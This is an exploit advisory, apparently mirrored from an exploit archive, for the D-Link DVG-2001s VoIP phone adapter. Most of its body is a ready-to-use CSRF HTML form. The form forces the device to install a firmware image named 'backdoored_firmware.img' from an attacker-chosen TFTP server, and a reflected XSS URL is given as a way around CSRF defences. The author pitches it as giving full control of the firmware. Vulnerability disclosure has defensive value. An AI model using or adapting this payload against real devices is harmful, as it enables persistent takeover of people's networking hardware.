D-Link VoIP Phone Adapter XSS/XSRF Remote Firmware Overwrite

🗓️ 29 Jan 2009 00:00:00Reported by Michael BrooksType

zdt🔗 0day.today👁 19 Views

D-Link VoIP Phone Adapter XSS/XSRF Remote Firmware Overwrite for model DVG-2001s f/w version 1.00.00

============================================================
D-Link VoIP Phone Adapter XSS/XSRF Remote Firmware Overwrite
============================================================


D-link VoIP Phone Adapter XSS and XSRF(remote firmware overwrite)
model number: DVG-2001s
f/w version 1.00.007

Better than just remote code execution,  you control the firmware.

<html>
	<form action="http://10.1.1.166/Forms/cbi_Set_SW_Update?16640,0,0,0,0,0,0,0,0"
method="POST">
		<input name="page_HiddenVar" value="0">
		<input name="TFTPServerAddress1" value="10">
		<input name="TFTPServerAddress2" value="1">
		<input name="TFTPServerAddress3" value="1">
		<input name="TFTPServerAddress4" value="1">
		<input name="FirmwareUpdate" value="enabled">
		<input name="FileName" value="backdoored_firmware.img">
		<input type=submit value="attack">
	</form>
</html>
and xss which can be used for csrf bypass:
http://10.1.1.166/Forms/page_CfgDevInfo_Set?%3Cscript%3Ealert(%22hacked%22)%3C/script%3E



#  0day.today [2018-02-19]  #

29 Jan 2009 00:00Current

7.1High risk

Vulners AI Score7.1